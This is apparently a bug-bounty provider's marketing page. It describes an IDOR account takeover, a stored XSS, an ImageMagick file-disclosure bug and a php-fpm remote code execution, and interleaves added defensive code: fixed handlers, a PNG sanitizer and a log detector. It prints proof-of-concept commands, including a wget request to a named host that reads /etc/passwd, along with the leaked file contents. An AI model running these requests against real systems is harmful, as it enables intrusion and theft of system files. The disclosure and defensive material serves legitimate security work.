Real-life scenarios
How Hacktrophy helped our customers to reveal critical vulnerabilities

The main advantages of bug bounty programs over traditional penetration tests and security audits:

  • Penetration tests are one-time security evaluations of a system or application as of a specific date (unfortunately, only a few customers do regular penetration testing).
  • Ethical hackers in bug bounty programs look for security vulnerabilities continuously; whenever a new vulnerability is published, they automatically rescan all applications registered in the bounty programs to check whether they are affected by it.
  • They have the maximum incentive to be the first to report a given vulnerability, because the first report is the one that receives the bounty.

Two successful hacks of customer applications

Disclaimer: The customer explicitly agreed to the publication of these findings.

1. Account Takeover (IDOR)

An insecure direct object reference (IDOR) with significant impact: it allowed the takeover of other users' accounts.
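The defect class behind this finding, shown as an added example (not Hacktrophy's or the customer's code): an "update email" operation that picks the target account from a client-supplied field, beside a version that derives ownership from the server-side session. The account store, the Session object and the request shape are assumptions made for the illustration.

```python
# Added example, not code from Hacktrophy or the affected customer.
# The account store, session object and request shape are assumptions.
from dataclasses import dataclass


@dataclass
class Account:
    account_id: int
    email: str


@dataclass
class Session:
    """Server-side session: the only trustworthy statement of who is calling."""
    account_id: int
    is_admin: bool = False


# Constructed sample data standing in for the customer's user database.
ACCOUNTS = {
    1: Account(1, "alice@example.invalid"),
    2: Account(2, "bob@example.invalid"),
}


def update_email_vulnerable(session: Session, request: dict) -> Account:
    """IDOR: the target account is chosen by a client-controlled field.

    The session proves the caller is logged in, but it is never compared with
    the object being modified, so any user can rewrite any other user's
    contact email. A changed email normally lets the attacker complete a
    password reset, which is how an IDOR turns into account takeover.
    """
    target = ACCOUNTS[int(request["account_id"])]  # trusts the request
    target.email = request["email"]
    return target


def update_email_fixed(session: Session, request: dict) -> Account:
    """Hardened: ownership is decided from the session, not the request.

    A client-supplied account_id is accepted only when it matches the session
    (or the caller is an administrator). A mismatch is rejected and is worth
    logging, because legitimate clients never send someone else's id.
    """
    requested = request.get("account_id")
    if requested is None:
        target_id = session.account_id
    else:
        target_id = int(requested)
        if target_id != session.account_id and not session.is_admin:
            raise PermissionError(
                f"account {session.account_id} may not modify account {target_id}"
            )
    target = ACCOUNTS[target_id]
    target.email = request["email"]
    return target
```

The same rule applies to every object lookup (profiles, orders, invoices): the identifier in the URL or body selects the object, but the session decides whether the caller may touch it, and the check has to run on every handler rather than only on the one that renders the page.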

 

2. Stored XSS in https://parentalcontrol.eset.com

It's possible to execute arbitrary JavaScript via stored XSS on https://parentalcontrol.eset.com by sending a crafted request to https://edf.eset.com/edf (API used by the mobile app). The payload is executed after clicking the Remove button in the "Rules -> Exception" section.

Impact

By executing arbitrary JavaScript, an attacker can impersonate the user logged into the parental control "parent" UI. This effectively leads to vertical privilege escalation.
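Data that enters through an API used by a mobile app is no more trustworthy than a web form, and the finding above shows the consequence when the web UI renders it verbatim. The following added example (not ESET's or Hacktrophy's code) builds an exception list the vulnerable way, with the stored name concatenated into both a text node and an inline onclick handler, and then the hardened way with context-aware HTML encoding and no inline event handler. The rule structure, the `removeRule` function and the markup are assumptions.

```python
# Added example, not ESET's or Hacktrophy's code. The rule structure, the
# page fragment and the click handler are assumptions about such a UI.
import html

# Constructed sample: rules as they might come back from the API. The second
# name is attacker-controlled text containing a script tag.
RULES = [
    {"id": 7, "name": "homework-site.example"},
    {"id": 8, "name": "<script>alert(1)</script>"},
]


def render_exceptions_vulnerable(rules):
    """Builds the 'Rules -> Exception' list by string concatenation.

    Whatever the API stored is copied verbatim into the page, so a name that
    contains markup becomes markup in the parent's browser. Embedding it in
    the Remove button's onclick handler adds a second, JavaScript, context.
    """
    items = "".join(
        f'<li data-id="{r["id"]}"><span>{r["name"]}</span> '
        f'<button onclick="removeRule({r["id"]}, \'{r["name"]}\')">Remove</button></li>'
        for r in rules
    )
    return f"<ul>{items}</ul>"


def render_exceptions_fixed(rules):
    """Same list with context-aware encoding.

    Text nodes and attribute values are HTML-escaped (quote=True also escapes
    quotes, which matters inside attributes). The name is never placed in an
    inline event handler: it travels in a data-* attribute and a static
    script reads it from the DOM as data.
    """
    items = "".join(
        f'<li data-id="{html.escape(str(r["id"]), quote=True)}" '
        f'data-name="{html.escape(r["name"], quote=True)}">'
        f'<span>{html.escape(r["name"])}</span> '
        f'<button class="remove">Remove</button></li>'
        for r in rules
    )
    return f"<ul>{items}</ul>"


# Static handler that replaces the inline onclick; it works under a
# Content-Security-Policy that forbids 'unsafe-inline'.
REMOVE_HANDLER = """
document.querySelectorAll('button.remove').forEach(function (b) {
  b.addEventListener('click', function () {
    var li = b.closest('li');
    removeRule(Number(li.dataset.id), li.dataset.name);  // data, never code
  });
});
"""
```

Escaping has to match the context the value lands in: the same name needs HTML escaping in a text node, attribute escaping inside a quoted attribute, and should not be placed in script at all. A Content-Security-Policy without 'unsafe-inline' is a useful second layer, because it refuses the inline onclick handler the vulnerable version depends on.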

app.hacktrophy.com hack using LFI (local file inclusion) via a vulnerable ImageMagick library

app.hacktrophy.com is vulnerable to local file inclusion (LFI) because an outdated version of ImageMagick is in use (CVE-2022-44268).

Proof-of-Concept:

Log into app.hacktrophy.com and upload the attached `poc.png` as the profile image (via "Account Settings"). Then open the "Application" tab in Chrome's "Developer Tools" and download the resulting image (see attached `screenshot.png`). Finally, run:

$ identify -verbose 658-jsbounty-thumb_poc.png | grep -A9999 "Raw profile type" | tail -n +4 | grep -v ":" | xxd -r -ps

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
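CVE-2022-44268 is triggered through PNG text metadata that ImageMagick interprets while processing the upload, and the leaked file comes back as the "Raw profile type" text chunk the PoC extracts. The real fix is updating ImageMagick; a defence-in-depth measure that would also have blunted this finding is to rebuild every uploaded PNG from an allow-list of chunks before any image library sees it, dropping text chunks and all other metadata. The following added example (not Hacktrophy's code) does that with a strict chunk parser that also rejects truncated files, CRC mismatches and trailing data; the allow-list and the constructed sample image are assumptions.

```python
# Added example, not Hacktrophy's code. It assumes the upload handler can
# rewrite the file before ImageMagick sees it; the chunk allow-list is a choice.
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunks a profile thumbnail actually needs. Everything else (text metadata,
# colour profiles, timestamps, private chunks) is dropped before decoding.
ALLOWED_CHUNKS = {b"IHDR", b"PLTE", b"tRNS", b"IDAT", b"IEND"}
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def parse_chunks(data: bytes) -> list:
    """Return [(type, payload), ...] after checking signature, lengths and CRCs.

    Rejects truncated files, CRC mismatches, data after IEND, and files that
    do not start with IHDR or end with IEND.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIGNATURE), []
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):
            raise ValueError(f"truncated {ctype!r} chunk")
        payload = data[start:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if crc != zlib.crc32(ctype + payload) & 0xFFFFFFFF:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        chunks.append((ctype, payload))
        pos = end + 4
        if ctype == b"IEND" and pos != len(data):
            raise ValueError("data after IEND")
    if not chunks or chunks[0][0] != b"IHDR" or chunks[-1][0] != b"IEND":
        raise ValueError("chunk sequence must start with IHDR and end with IEND")
    return chunks


def text_keywords(data: bytes) -> list:
    """Keywords of the text chunks present; useful for logging what was stripped."""
    keys = []
    for ctype, payload in parse_chunks(data):
        if ctype in TEXT_CHUNKS:
            keys.append(payload.split(b"\x00", 1)[0].decode("latin-1"))
    return keys


def sanitize_png(data: bytes) -> tuple:
    """Rebuild the PNG keeping only allow-listed chunks; return (bytes, dropped types)."""
    chunks = parse_chunks(data)
    kept = [(t, p) for t, p in chunks if t in ALLOWED_CHUNKS]
    dropped = [t for t, _ in chunks if t not in ALLOWED_CHUNKS]
    return PNG_SIGNATURE + b"".join(_chunk(t, p) for t, p in kept), dropped


def make_sample_png() -> bytes:
    """Constructed 1x1 RGB PNG with a benign tEXt chunk, for trying the sanitizer."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte 0 + one red pixel
    text = b"Comment\x00constructed sample"
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))
```

Run `sanitize_png` on the raw upload and pass only its output to the thumbnailer; log the dropped chunk types and `text_keywords` so that an unusual upload shows up in monitoring. Restricting the coders ImageMagick may use through its policy.xml is a complementary control, but neither measure replaces patching the library.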

 

Hack of cloud.nethemba.com via RCE in php-fpm

Remote Code Execution in https://cloud.nethemba.com via CVE-2019-11043. PoC:

wget "https://cloud.nethemba.com/index.php?a=/bin/cat%20/etc/passwd" -qO-

Output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

...
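Once the PoC works, every command runs as an ordinary HTTP request to a PHP script, so the web server's access log is where the activity is visible. The following added example (not Nethemba's or Hacktrophy's code) scans nginx "combined"-format log lines for requests to PHP scripts whose decoded query values look like commands or sensitive file paths, as in the request above. The log lines are constructed, and the rule set is a deliberately small heuristic, not a complete signature.

```python
# Added example, not Nethemba's or Hacktrophy's code. Log format is the
# nginx "combined" format; the heuristics and sample lines are assumptions.
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines. The first mirrors the request shape
# shown in the PoC above; the others are ordinary traffic to the same host.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Oct/2019:10:15:01 +0000] "GET /index.php?a=/bin/cat%20/etc/passwd HTTP/1.1" 200 1829 "-" "Wget/1.20.3"
198.51.100.7 - alice [24/Oct/2019:10:15:02 +0000] "GET /index.php/apps/files/?dir=/Documents HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Oct/2019:10:15:03 +0000] "GET /index.php?a=id HTTP/1.1" 200 57 "-" "Wget/1.20.3"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Each rule: (reason, regex applied to the percent-decoded parameter value).
RULES = [
    ("absolute path to a system binary", re.compile(r"^/(?:usr/)?s?bin/\S+")),
    ("sensitive system file referenced", re.compile(r"/etc/(?:passwd|shadow|group)\b")),
    ("shell metacharacter", re.compile(r"[;|`]|\$\(")),
]


@dataclass
class Finding:
    ip: str
    timestamp: str
    target: str
    param: str
    value: str
    reasons: list = field(default_factory=list)


def scan_access_log(lines) -> list:
    """Flag requests to PHP scripts whose query values look like commands.

    Only the decoded query string is inspected; lines that do not parse are
    skipped rather than raising, so a partial log still produces findings.
    """
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if ".php" not in parts.path:
            continue
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                reasons = [why for why, rx in RULES if rx.search(value)]
                if reasons:
                    findings.append(
                        Finding(m["ip"], m["ts"], m["target"], param, value, reasons)
                    )
    return findings
```

The third sample line (`a=id`) is not flagged: a bare command name carries none of the features the rules look for, which is the usual trade-off between a tight heuristic and false positives. Detection of this kind is a complement to the fix, not a substitute: the vulnerability was closed in the PHP releases that fixed CVE-2019-11043 (7.1.33, 7.2.24 and 7.3.11), and the widely published nginx-side mitigation is `try_files $fastcgi_script_name =404;` in the PHP location block, so that requests for non-existent scripts never reach php-fpm.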

Lessons learned

The hackers could spot the given vulnerabilities immediately (there is a direct incentive to be the first one), often before official security patches were released.

Thanks to the Hacktrophy bug bounty program, you are informed about vulnerabilities IMMEDIATELY - no need to wait for black hat hackers to exploit them with severe and unexpected consequences.

Remember:

One thousand white hat hackers are usually faster than one black hat hacker.